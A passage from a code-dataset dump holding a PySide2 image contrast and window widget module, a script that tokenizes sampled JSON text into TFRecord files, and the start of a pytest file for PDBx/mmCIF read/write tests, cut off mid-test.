"call"}, {"api_name": "shadow.models.environment.Environment", "line_number": 43, "usage_type": "call"}, {"api_name": "enum.Enum", "line_number": 80, "usage_type": "name"}, {"api_name": "shadow.algorithms.heuristic.heft", "line_number": 98, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 100, "usage_type": "call"}, {"api_name": "topsim.core.task.Task", "line_number": 113, "usage_type": "call"}]} +{"seq_id": "536253665", "text": "import timeit\nimport numpy as np\nfrom PySide2.QtCore import Signal, Qt\nfrom PySide2.QtWidgets import (QToolBar,\n QAction, QComboBox, QPushButton, QLabel, \n QWidget, QDoubleSpinBox, QHBoxLayout, QVBoxLayout)\nfrom PySide2.QtGui import QIcon, QPixmap\n\nfrom wezel import icons\n\nlistColors = ['gray', 'cividis', 'magma', 'plasma', 'viridis', \n 'Greys', 'Purples', 'Blues', 'Greens', 'Oranges', 'Reds',\n 'YlOrBr', 'YlOrRd', 'OrRd', 'PuRd', 'RdPu', 'BuPu',\n 'GnBu', 'PuBu', 'YlGnBu', 'PuBuGn', 'BuGn', 'YlGn',\n 'binary', 'gist_yarg', 'gist_gray', 'bone', 'pink',\n 'spring', 'summer', 'autumn', 'winter', 'cool', 'Wistia',\n 'hot', 'afmhot', 'gist_heat', 'copper',\n 'PiYG', 'PRGn', 'BrBG', 'PuOr', 'RdGy', 'RdBu',\n 'RdYlBu', 'RdYlGn', 'Spectral', 'coolwarm', 'bwr', 'seismic',\n 'twilight', 'twilight_shifted', 'hsv',\n 'flag', 'prism', 'ocean', 'gist_earth', 'terrain', 'gist_stern',\n 'gnuplot', 'gnuplot2', 'CMRmap', 'cubehelix', 'brg', 'turbo',\n 'gist_rainbow', 'rainbow', 'jet', 'nipy_spectral', 'gist_ncar']\n\nQComboBoxStyleSheet = \"\"\"\n\nQComboBox::drop-down \n{\n border: 0px; /* This seems to replace the whole arrow of the combo box */\n}\nQComboBox:down-arrow \n{\n image: url(\"icons/fugue_icons/spectrum.png\");\n width: 14px;\n height: 14px;\n}\n\"\"\"\n\n\nclass ImageWindow(QWidget):\n \"\"\"Widget to set and manage 
color and window settings of a Series\"\"\"\n\n valueChanged = Signal(list) # emitted when the color settings are changed by the widget\n\n def __init__(self):\n super().__init__()\n\n # Widgets\n self.mode = LockUnlockWidget(toolTip = 'Lock image settings')\n self.upper = ImageUpper()\n self.lower = ImageLower()\n\n # Connections\n self.upper.valueChanged.connect(self._valueChanged)\n self.lower.valueChanged.connect(self._valueChanged)\n\n # Layout\n layout = QVBoxLayout()\n layout.setContentsMargins(0,0,0,0)\n layout.setSpacing(0)\n layout.addWidget(self.upper)\n layout.addWidget(self.lower)\n #self.setStyleSheet(\"background-color: white\")\n self.setLayout(layout)\n\n def _valueChanged(self):\n self.valueChanged.emit(self.getValue())\n\n def setData(self, array, center, width, set=None):\n min = np.amin(array)\n max = np.amax(array)\n if set is None:\n set = not self.mode.isLocked\n self.upper.setData(min, max, center+width/2, set)\n self.lower.setData(min, max, center-width/2, set)\n\n def getValue(self):\n upper = self.upper.getValue()\n lower = self.lower.getValue()\n brightness = (upper+lower)/2\n contrast = upper-lower\n return [brightness, contrast]\n\n def setValue(self, WindowCenter=None, WindowWidth=None):\n self.upper.setValue(WindowCenter+WindowWidth/2)\n self.lower.setValue(WindowCenter-WindowWidth/2)\n\n def isLocked(self):\n return self.mode.isLocked\n \n def spinBox(self, i):\n if i == 0:\n return self.lower.spinBox\n if i == 1:\n return self.upper.spinBox\n \n\n\nclass ImageUpper(QWidget):\n\n valueChanged = Signal(float)\n\n def __init__(self):\n super().__init__()\n\n self.label = QLabel()\n self.label.setPixmap(QPixmap(icons.arrow_stop_090))\n #self.label.setFixedSize(24, 24)\n self.spinBox = QDoubleSpinBox()\n self.spinBox.valueChanged.connect(self.spinBoxValueChanged)\n self.spinBox.setToolTip(\"Adjust upper value of color window\")\n self.spinBox.setDecimals(6)\n self.spinBox.setMinimum(-1000000000.00)\n self.spinBox.setMaximum(+1000000000.00)\n self.spinBox.setWrapping(False)\n self.spinBox.setFixedWidth(115)\n \n # Layout\n self.layout = QHBoxLayout()\n self.layout.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n self.layout.setContentsMargins(0,0,0,0)\n self.layout.setSpacing(2)\n self.layout.addWidget(self.spinBox)\n self.layout.addWidget(self.label)\n #self.setMaximumWidth(120)\n self.setLayout(self.layout)\n\n def setData(self, min, max, value, set=True):\n self.spinBox.blockSignals(True)\n if value is None: \n self.spinBox.setValue(1) \n self.spinBox.setSingleStep(0.1)\n else:\n if set: # adjust spinbox value to image contrast\n self.spinBox.setValue(value)\n self.setSpinBoxStepSize(min, max)\n self.spinBox.blockSignals(False)\n\n def getValue(self):\n return self.spinBox.value()\n\n def setValue(self, value):\n self.spinBox.blockSignals(True)\n self.spinBox.setValue(value)\n self.spinBox.blockSignals(False)\n\n def setSpinBoxStepSize(self, min, max):\n if min is None:\n return\n width = max-min\n spinBoxStep = float(width / 5)\n self.spinBox.setSingleStep(spinBoxStep)\n\n def spinBoxValueChanged(self):\n value = self.spinBox.value() \n self.valueChanged.emit(value)\n\n\nclass ImageLower(QWidget):\n\n valueChanged = Signal(float)\n\n def __init__(self):\n super().__init__() \n self.label = QLabel()\n self.label.setPixmap(QPixmap(icons.arrow_stop_270))\n #self.label.setFixedSize(24, 24)\n self.spinBox = QDoubleSpinBox()\n self.spinBox.valueChanged.connect(self.spinBoxValueChanged)\n self.spinBox.setToolTip(\"Adjust lower value of color window\")\n 
self.spinBox.setDecimals(6)\n self.spinBox.setMinimum(-1000000000.00)\n self.spinBox.setMaximum(+1000000000.00)\n self.spinBox.setWrapping(False)\n self.spinBox.setFixedWidth(115)\n \n # Layout\n self.layout = QHBoxLayout()\n self.layout.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n self.layout.setContentsMargins(0,0,0,0)\n self.layout.setSpacing(2)\n self.layout.addWidget(self.spinBox)\n self.layout.addWidget(self.label)\n #self.setMaximumWidth(120)\n self.setLayout(self.layout)\n\n def setData(self, min, max, value, set=True):\n self.spinBox.blockSignals(True)\n if value is None: \n self.spinBox.setValue(1) \n self.spinBox.setSingleStep(0.1)\n else:\n if set: # adjust spinbox value to image contrast\n self.spinBox.setValue(value)\n self.setSpinBoxStepSize(min, max)\n self.spinBox.blockSignals(False)\n\n def getValue(self):\n return self.spinBox.value()\n\n def setValue(self, value):\n self.spinBox.blockSignals(True)\n self.spinBox.setValue(value)\n self.spinBox.blockSignals(False)\n\n def setSpinBoxStepSize(self, min, max):\n if min is None:\n return\n width = max-min\n spinBoxStep = float(width / 5)\n self.spinBox.setSingleStep(spinBoxStep)\n\n def spinBoxValueChanged(self):\n value = self.spinBox.value()\n self.valueChanged.emit(value)\n\n\nclass ImageContrastWindow(QWidget):\n \"\"\"Widget to set and manage color and window settings of a Series\"\"\"\n\n valueChanged = Signal(list) # emitted when the color settings are changed by the widget\n\n def __init__(self, layout=True):\n super().__init__()\n self._setWidgets(layout)\n self._setConnections()\n if layout:\n self._setLayout()\n\n def _setWidgets(self, layout):\n self.mode = LockUnlockWidget(toolTip = 'Lock image settings')\n self.brightness = ImageBrightness(layout=layout)\n self.contrast = ImageContrast(layout=layout)\n\n def _setConnections(self):\n self.brightness.valueChanged.connect(self._valueChanged)\n self.contrast.valueChanged.connect(self._valueChanged)\n\n def _setLayout(self):\n layout = QVBoxLayout()\n layout.setContentsMargins(0,0,0,0)\n layout.setSpacing(0)\n #layout.addWidget(self.mode)\n layout.addWidget(self.brightness)\n layout.addWidget(self.contrast)\n #self.setStyleSheet(\"background-color: white\")\n self.setLayout(layout)\n\n def _valueChanged(self):\n self.valueChanged.emit(self.getValue())\n\n def setData(self, array, center, width, set=None):\n min = np.amin(array)\n max = np.amax(array)\n if set is None:\n set = not self.mode.isLocked\n self.brightness.setData(min, max, center, set)\n self.contrast.setData(min, max, width, set)\n\n def getValue(self):\n return [\n self.brightness.getValue(),\n self.contrast.getValue(),\n ]\n\n def setValue(self, WindowCenter=None, WindowWidth=None):\n self.brightness.setValue(WindowCenter)\n self.contrast.setValue(WindowWidth)\n\n\nclass ImageContrast(QWidget):\n\n valueChanged = Signal(float)\n\n def __init__(self, layout=True):\n super().__init__()\n\n self.label = QLabel()\n self.label.setPixmap(QPixmap(icons.contrast))\n #self.label.setFixedSize(24, 24)\n self.spinBox = QDoubleSpinBox()\n self.spinBox.valueChanged.connect(self.spinBoxValueChanged)\n self.spinBox.setToolTip(\"Adjust Contrast\")\n self.spinBox.setMinimum(0)\n self.spinBox.setMaximum(1000000000.00)\n self.spinBox.setWrapping(False)\n self.spinBox.setFixedWidth(115)\n if layout:\n self.layout = QHBoxLayout()\n self.layout.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n self.layout.setContentsMargins(0,0,0,0)\n self.layout.setSpacing(2)\n self.layout.addWidget(self.spinBox)\n 
self.layout.addWidget(self.label)\n #self.setMaximumWidth(120)\n self.setLayout(self.layout)\n\n def setData(self, min, max, width, set=True):\n self.spinBox.blockSignals(True)\n if width is None: \n self.spinBox.setValue(1) \n self.spinBox.setSingleStep(0.1)\n else:\n if set: # adjust spinbox value to image contrast\n self.spinBox.setValue(width)\n self.setSpinBoxStepSize(min, max)\n self.spinBox.blockSignals(False)\n\n def getValue(self):\n return self.spinBox.value()\n\n def setValue(self, value):\n self.spinBox.blockSignals(True)\n self.spinBox.setValue(value)\n self.spinBox.blockSignals(False)\n\n def setSpinBoxStepSize(self, min, max):\n if min is None:\n return\n width = max-min\n spinBoxStep = float(width / 10)\n self.spinBox.setSingleStep(spinBoxStep)\n\n def spinBoxValueChanged(self):\n \"\"\"Update Window Width of the image.\"\"\"\n width = self.spinBox.value() \n self.valueChanged.emit(width)\n\n\nclass ImageBrightness(QWidget):\n\n valueChanged = Signal(float)\n\n def __init__(self, layout=True):\n super().__init__() \n self.label = QLabel()\n self.label.setPixmap(QPixmap(icons.brightness))\n #self.label.setFixedSize(24, 24)\n self.spinBox = QDoubleSpinBox()\n self.spinBox.valueChanged.connect(self.spinBoxValueChanged)\n self.spinBox.setToolTip(\"Adjust Brightness\")\n self.spinBox.setMinimum(-1000000000.00)\n self.spinBox.setMaximum(+1000000000.00)\n self.spinBox.setWrapping(False)\n self.spinBox.setFixedWidth(115)\n if layout:\n self.layout = QHBoxLayout()\n self.layout.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n self.layout.setContentsMargins(0,0,0,0)\n self.layout.setSpacing(2)\n self.layout.addWidget(self.spinBox)\n self.layout.addWidget(self.label)\n #self.setMaximumWidth(120)\n self.setLayout(self.layout)\n\n def setData(self, min, max, center, set=True):\n self.spinBox.blockSignals(True)\n if min is None: \n self.spinBox.setValue(1) \n self.spinBox.setSingleStep(0.1)\n else:\n if set: # adjust spinbox value to image contrast\n self.spinBox.setValue(center)\n self.setSpinBoxStepSize(min, max)\n self.spinBox.blockSignals(False)\n\n def getValue(self):\n return self.spinBox.value()\n\n def setValue(self, center):\n self.spinBox.blockSignals(True)\n self.spinBox.setValue(center)\n self.spinBox.blockSignals(False)\n\n def setSpinBoxStepSize(self, min, max):\n if min is None:\n return\n center = (max+min)/2\n spinBoxStep = float(center / 10)\n self.spinBox.setSingleStep(spinBoxStep)\n\n def spinBoxValueChanged(self):\n center = self.spinBox.value()\n self.valueChanged.emit(center)\n\n\n\nclass LockUnlockWidget(QToolBar):\n\n toggled = Signal()\n\n def __init__(self, toolTip = 'Lock state'):\n super().__init__()\n self.isLocked = True\n self.icon_lock = QIcon(icons.lock) \n self.icon_lock_unlock = QIcon(icons.lock_unlock) \n self.mode = QAction()\n self.mode.setIcon(self.icon_lock)\n self.mode.setToolTip(toolTip)\n self.mode.triggered.connect(self.toggle) \n self.addAction(self.mode)\n\n def toggle(self):\n if self.isLocked == True:\n self.mode.setIcon(self.icon_lock_unlock)\n self.isLocked = False\n elif self.isLocked == False:\n self.mode.setIcon(self.icon_lock)\n self.isLocked = True \n self.toggled.emit()\n\n\n\nclass DeleteImageButton(QPushButton):\n\n buttonClicked = Signal()\n\n def __init__(self, image=None):\n super().__init__()\n self.setFixedSize(24, 24)\n self.setIcon(QIcon(icons.bin_metal))\n self.setToolTip('Delete image')\n self.clicked.connect(self.delete) \n self.setData(image)\n\n def delete(self):\n if self.image is None:\n return\n self.image.remove()\n 
self.buttonClicked.emit()\n\n def setData(self, image):\n self.image = image\n\n\nclass ExportImageButton(QPushButton):\n\n def __init__(self, image=None):\n super().__init__()\n \n self.setFixedSize(24, 24)\n self.setIcon(QIcon(icons.blue_document_export))\n self.setToolTip('Export as .png')\n self.clicked.connect(self.export)\n self.setData(image)\n\n def setData(self, image):\n self.image = image\n\n def export(self):\n \"\"\"Export as png.\"\"\"\n if self.image is None: \n return\n path = self.image.dialog.directory(\"Where do you want to export the data?\")\n self.image.export_as_png(path)\n\n\nclass RestoreImageButton(QPushButton):\n\n buttonClicked = Signal()\n\n def __init__(self, image=None):\n super().__init__()\n self.setFixedSize(24, 24)\n self.setIcon(QIcon(icons.arrow_curve_180_left))\n self.setToolTip('Undo changes')\n self.clicked.connect(self.restore) \n self.setData(image)\n\n def setData(self, image):\n self.image = image\n\n def restore(self):\n if self.image is None: \n return\n self.image.restore()\n self.buttonClicked.emit()\n\n\nclass SaveImageButton(QPushButton):\n\n buttonClicked = Signal()\n\n def __init__(self, image=None):\n super().__init__()\n\n self.setFixedSize(24, 24)\n self.setIcon(QIcon(icons.disk))\n self.setToolTip('Save changes')\n self.clicked.connect(self.save) \n\n self.setData(image)\n\n def save(self):\n \n if self.image is None:\n return\n self.image.save()\n self.buttonClicked.emit()\n\n def setData(self, image):\n self.image = image\n\n", "sub_path": "src/wezel/widgets/dbimage.py", "file_name": "dbimage.py", "file_ext": "py", "file_size_in_byte": 15471, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "PySide2.QtWidgets.QWidget", "line_number": 40, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 43, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QVBoxLayout", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 71, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 99, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 101, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QLabel", "line_number": 106, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QPixmap", "line_number": 107, "usage_type": "call"}, {"api_name": "wezel.icons.arrow_stop_090", "line_number": 107, "usage_type": "attribute"}, {"api_name": "wezel.icons", "line_number": 107, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QDoubleSpinBox", "line_number": 109, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QHBoxLayout", "line_number": 119, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.AlignLeft", "line_number": 120, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 120, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.AlignVCenter", "line_number": 120, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 159, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 161, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QLabel", "line_number": 165, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QPixmap", "line_number": 166, "usage_type": "call"}, {"api_name": "wezel.icons.arrow_stop_270", "line_number": 166, "usage_type": "attribute"}, {"api_name": "wezel.icons", "line_number": 166, "usage_type": 
"name"}, {"api_name": "PySide2.QtWidgets.QDoubleSpinBox", "line_number": 168, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QHBoxLayout", "line_number": 178, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.AlignLeft", "line_number": 179, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 179, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.AlignVCenter", "line_number": 179, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 218, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 221, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QVBoxLayout", "line_number": 240, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 254, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 271, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 273, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QLabel", "line_number": 278, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QPixmap", "line_number": 279, "usage_type": "call"}, {"api_name": "wezel.icons.contrast", "line_number": 279, "usage_type": "attribute"}, {"api_name": "wezel.icons", "line_number": 279, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QDoubleSpinBox", "line_number": 281, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QHBoxLayout", "line_number": 289, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.AlignLeft", "line_number": 290, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 290, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.AlignVCenter", "line_number": 290, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 330, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 332, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QLabel", "line_number": 336, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QPixmap", "line_number": 337, "usage_type": "call"}, {"api_name": "wezel.icons.brightness", "line_number": 337, "usage_type": "attribute"}, {"api_name": "wezel.icons", "line_number": 337, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QDoubleSpinBox", "line_number": 339, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QHBoxLayout", "line_number": 347, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.AlignLeft", "line_number": 348, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 348, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.AlignVCenter", "line_number": 348, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets.QToolBar", "line_number": 388, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 390, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QIcon", "line_number": 395, "usage_type": "call"}, {"api_name": "wezel.icons.lock", "line_number": 395, "usage_type": "attribute"}, {"api_name": "wezel.icons", "line_number": 395, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QIcon", "line_number": 396, "usage_type": "call"}, {"api_name": "wezel.icons.lock_unlock", "line_number": 396, "usage_type": "attribute"}, {"api_name": "wezel.icons", "line_number": 396, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QAction", "line_number": 397, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QPushButton", "line_number": 414, "usage_type": "name"}, {"api_name": 
"PySide2.QtCore.Signal", "line_number": 416, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QIcon", "line_number": 421, "usage_type": "call"}, {"api_name": "wezel.icons.bin_metal", "line_number": 421, "usage_type": "attribute"}, {"api_name": "wezel.icons", "line_number": 421, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QPushButton", "line_number": 436, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QIcon", "line_number": 442, "usage_type": "call"}, {"api_name": "wezel.icons.blue_document_export", "line_number": 442, "usage_type": "attribute"}, {"api_name": "wezel.icons", "line_number": 442, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QPushButton", "line_number": 458, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 460, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QIcon", "line_number": 465, "usage_type": "call"}, {"api_name": "wezel.icons.arrow_curve_180_left", "line_number": 465, "usage_type": "attribute"}, {"api_name": "wezel.icons", "line_number": 465, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QPushButton", "line_number": 480, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 482, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QIcon", "line_number": 488, "usage_type": "call"}, {"api_name": "wezel.icons.disk", "line_number": 488, "usage_type": "attribute"}, {"api_name": "wezel.icons", "line_number": 488, "usage_type": "name"}]} +{"seq_id": "115759499", "text": "\"\"\"\n1 - Read TXT file with JSON string in each line\n2 - Read randomly given weights to each file\n3 - Tokenize and pack as .tfrecord files\n\"\"\"\nimport os\nimport re\nimport csv\nimport sys\nimport json\nimport random\nimport argparse\nimport tensorflow as tf\n\nfrom tokenizers import ByteLevelBPETokenizer\n\ncsv.field_size_limit(sys.maxsize)\n\n\nparser = argparse.ArgumentParser(description='SCRAPE!')\nparser.add_argument(\n '-fold',\n dest='fold',\n default=0,\n type=int,\n help='Which fold we are on'\n)\nparser.add_argument(\n '-num_folds',\n dest='num_folds',\n default=1,\n type=int,\n help='Number of folds (corresponding to both the number of training files and the number of testing files)',\n)\nparser.add_argument(\n '-seed',\n dest='seed',\n default=1337,\n type=int,\n help='which seed to use'\n)\nparser.add_argument(\n '-base_fn',\n dest='base_fn',\n default='news2016zh_',\n type=str,\n help='We will output files that are like {base_fn}_{n}.tfrecord for n in 0, ..., 1023'\n)\n\nparser.add_argument(\n '-input_fn',\n dest='input_fn',\n default='./dataset/',\n type=str,\n help='Path to dataset in json format. 
THIS MUST BE A LOCAL FILE.'\n)\nparser.add_argument(\n '-max_seq_length',\n dest='max_seq_length',\n default=10240,\n type=int,\n help='Max sequence length',\n)\n\nparser.add_argument(\n '-vocab_file',\n dest='vocab_file',\n default='../vocabs/spanish/vocab.json',\n type=str,\n help='Tokenizer vocab.json file.'\n)\nparser.add_argument(\n '-merges_file',\n dest='merges_file',\n default='../vocabs/spanish/merges.txt',\n type=str,\n help='Tokenizer merges.txt file.'\n)\n\nargs = parser.parse_args()\n\n\ndef create_int_feature(values):\n feature = tf.train.Feature(\n int64_list=tf.train.Int64List(value=list(values)))\n return feature\n\n\ntokenizer = ByteLevelBPETokenizer(args.vocab_file, args.merges_file, dropout=0.1)\n\nbiggest_file_line_count = int(args.input_fn.split(\",\")[0])\npaths = []\n\nfor path_repeat in args.input_fn.split(\",\")[1:]:\n splitted_path = path_repeat.split(\":\")\n path_dict = {\n \"path\": splitted_path[0],\n \"probability\": float(splitted_path[1]),\n \"file_size\": os.stat(splitted_path[0]).st_size,\n \"file\": open(splitted_path[0])\n }\n paths.append(path_dict)\n\n\ndef get_windows():\n for n in range(round(biggest_file_line_count / args.num_folds)):\n for path in paths: # For each path\n if random.random() < path[\"probability\"]: # Account for sampling frequency\n random_point = random.randint(0, path[\"file_size\"])\n path[\"file\"].seek(random_point)\n path[\"file\"].readline() # skip this line to clear the partial line\n line_str = path[\"file\"].readline()\n try:\n json_obj = json.loads(line_str)\n except json.decoder.JSONDecodeError:\n print(\"Json Error:\", line_str)\n continue # skip this sample instead of yielding a stale object\n yield json_obj\n\n\ntrain_file = args.base_fn + 'train_windowed_{}.tfrecord'.format(args.fold)\ntrain_writer = tf.io.TFRecordWriter(train_file)\n\n\nfor window in get_windows():\n encoded_string = []\n for text in window:\n encoded_string.append(0) # Appending <|endoftext|> token\n text = re.sub(r'(\\W|\\w)\\n', r'\\1', text) # Clean line breaks\n encoded_string += tokenizer.encode(text).ids\n if len(encoded_string) < args.max_seq_length:\n print(\"Too short\")\n continue\n\n if random.random() > 0.5:\n encoded_string = encoded_string[:args.max_seq_length]\n else:\n encoded_string = encoded_string[len(encoded_string) - args.max_seq_length:]\n assert len(encoded_string) == args.max_seq_length, \"Window length {} is not equal to desired length {}\".format(len(encoded_string), args.max_seq_length)\n\n features = {\"input_ids\": create_int_feature(encoded_string)}\n tf_example = tf.train.Example(features=tf.train.Features(feature=features))\n train_writer.write(tf_example.SerializeToString())\n\ntrain_writer.close()\n", "sub_path": "dataset/prepare_data_esp.py", "file_name": "prepare_data_esp.py", "file_ext": "py", "file_size_in_byte": 4057, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "csv.field_size_limit", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.maxsize", "line_number": 17, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.train.Feature", "line_number": 84, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 84, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Int64List", "line_number": 85, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 85, "usage_type": "attribute"}, {"api_name": "tokenizers.ByteLevelBPETokenizer", "line_number": 89, "usage_type": 
"call"}, {"api_name": "os.stat", "line_number": 99, "usage_type": "call"}, {"api_name": "random.random", "line_number": 108, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 109, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 114, "usage_type": "call"}, {"api_name": "json.decoder", "line_number": 115, "usage_type": "attribute"}, {"api_name": "tensorflow.io.TFRecordWriter", "line_number": 122, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 122, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 129, "usage_type": "call"}, {"api_name": "random.random", "line_number": 135, "usage_type": "call"}, {"api_name": "tensorflow.train.Example", "line_number": 142, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 142, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Features", "line_number": 142, "usage_type": "call"}]} +{"seq_id": "233585278", "text": "\"\"\" Various tests cases for PDBx/mmCIF data file and dictionary reader and writer.\n\"\"\"\n\nfrom __future__ import absolute_import\n\nimport pytest\n\ntry:\n from pathlib import Path\nexcept ImportError:\n from pathlib2 import Path\n\nfrom mmcif.api.DataCategory import DataCategory\nfrom mmcif.api.DataCategoryBase import DataCategoryBase\nfrom mmcif.api.PdbxContainers import DataContainer\nfrom mmcif.io.PdbxReader import PdbxReader\nfrom mmcif.io.PdbxWriter import PdbxWriter\n\nfrom six.moves import range\n\n__docformat__ = \"restructuredtext en\"\n__author__ = \"Igor Petrik\"\n__email__ = \"petrikigor@gmail.com\"\n__license__ = \"Apache 2.0\"\n\nclass TestPdbxReadWrite():\n __slots__ = ()\n\n @pytest.fixture()\n def rw_data(self, test_files, in_tmpdir):\n data = dict(pathPdbxDataFile = test_files / \"specialTestFile.cif\", \n pathBigPdbxDataFile = test_files / \"1ffk.cif\",\n pathOutputFile1 = Path(\"testOutputDataFile1.cif\"),\n pathOutputFile2 = Path(\"testOutputDataFile2.cif\"),\n pathOutputFile3 = Path(\"testOutputDataFileStopToken3.cif\"),\n pathOutputFile4 = Path(\"testOutputDataFile4.cif\"),\n pathOutputFile5 = Path(\"testOutputDataFile5.cif\"),\n pathTestFile = test_files / \"testSingleRow.cif\",\n pathTestFileStop = test_files / \"testFileWithStopTokens.cif\")\n return data\n\n def test_single_row(self, rw_data):\n myDataList = []\n curContainer = DataContainer(\"myblock\")\n aCat = DataCategory(\"pdbx_seqtool_mapping_ref\")\n aCat.appendAttribute(\"ordinal\")\n aCat.appendAttribute(\"entity_id\")\n aCat.appendAttribute(\"auth_mon_id\")\n aCat.appendAttribute(\"auth_mon_num\")\n aCat.appendAttribute(\"pdb_chain_id\")\n aCat.appendAttribute(\"ref_mon_id\")\n aCat.appendAttribute(\"ref_mon_num\")\n aCat.appendAttribute(\"details\")\n aCat.append([1, 2, 3, 4, 5, 6, 7, 'data_my_big_data_file'])\n aCat.append([1, 2, 3, 4, 5, 6, 7, 'loop_my_big_data_loop'])\n aCat.append([1, 2, 3, 4, 5, 6, 7, 'save_my_big_data_saveframe'])\n aCat.append([1, 2, 3, 4, 5, 6, 7, '_category.item'])\n\n curContainer.append(aCat)\n\n bCat = curContainer.getObj(\"pdbx_seqtool_mapping_ref\")\n print(\"----attribute list %r\\n\" % bCat.getAttributeList())\n row = bCat.getRow(0)\n print(\"----ROW %r\\n\" % row)\n\n with open(str(rw_data['pathOutputFile2']), \"w\") as ofh:\n myDataList.append(curContainer)\n pdbxW = PdbxWriter(ofh)\n pdbxW.write(myDataList)\n\n assert len(myDataList) == 1\n\n def test_single_row_file(self, rw_data):\n myDataList = []\n with open(str(rw_data['pathTestFile']), \"r\") as ifh:\n pRd = PdbxReader(ifh)\n pRd.read(myDataList)\n\n myBlock = 
